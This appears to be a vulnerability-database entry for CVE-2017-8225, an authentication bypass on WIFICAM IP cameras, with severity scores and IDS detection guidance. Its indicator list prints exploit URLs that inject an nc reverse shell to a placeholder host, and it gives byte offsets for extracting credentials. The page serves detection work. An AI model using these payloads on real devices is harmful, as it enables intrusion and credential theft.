cbcvebase.
CVE-2017-8225
published 2017-04-25

CVE-2017-8225: On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by…

PriorityP188critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
17.87%
96.8th percentile
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.

Detection & IOCsextracted from sources · hover to see the quote

url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
url/ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
filenameSystem.ini
  • Authentication bypass via empty loginuse and loginpas parameters in URI — detect HTTP requests to camera CGI endpoints where both loginuse= and loginpas= are empty strings
  • Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi on GoAhead WIFICAM devices for command injection patterns in the pwd= parameter (e.g., subshell syntax such as $(...) or backticks)
  • Detect unauthenticated access to .ini files (e.g., System.ini) on GoAhead WIFICAM devices — these contain plaintext credentials and should never be publicly accessible
  • Check Point IPS protection name for this CVE: 'Wireless IP Camera (P2P) WIFICAM Cameras Information Disclosure' — use as a signature reference for network IDS/IPS tuning
  • Check Point IPS protection name for associated RCE: 'Wireless IP Camera (P2P) WIFICAM Cameras Remote Code Execution' — use as a signature reference for network IDS/IPS tuning
  • Binary pattern in credential extraction: look for the byte sequence 0x0a 0x0a 0x0a 0x0a 0x01 in HTTP responses from camera devices — credentials are located at fixed offsets (+138 bytes for username, +170 bytes for password) after this marker
  • ·The exploit hardcodes CAM_PORT 80 as the default attack port, but observed infected GoAhead devices in the wild were found running on port 81 over TCP — scanning/detection should cover both ports
  • ·The REMOTE_HOST and REMOTE_PORT values in the exploit (192.168.1.1 / 1337) are placeholder defaults; real-world attacks will use attacker-controlled IPs and arbitrary ports for the reverse shell callback
  • ·The vulnerability affects GoAhead-based Wireless IP Camera (P2P) WIFICAM devices; the same IoTroop/IoTReaper botnet campaign also exploited vulnerabilities in D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, and Synology devices — detections should not be scoped to GoAhead alone

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.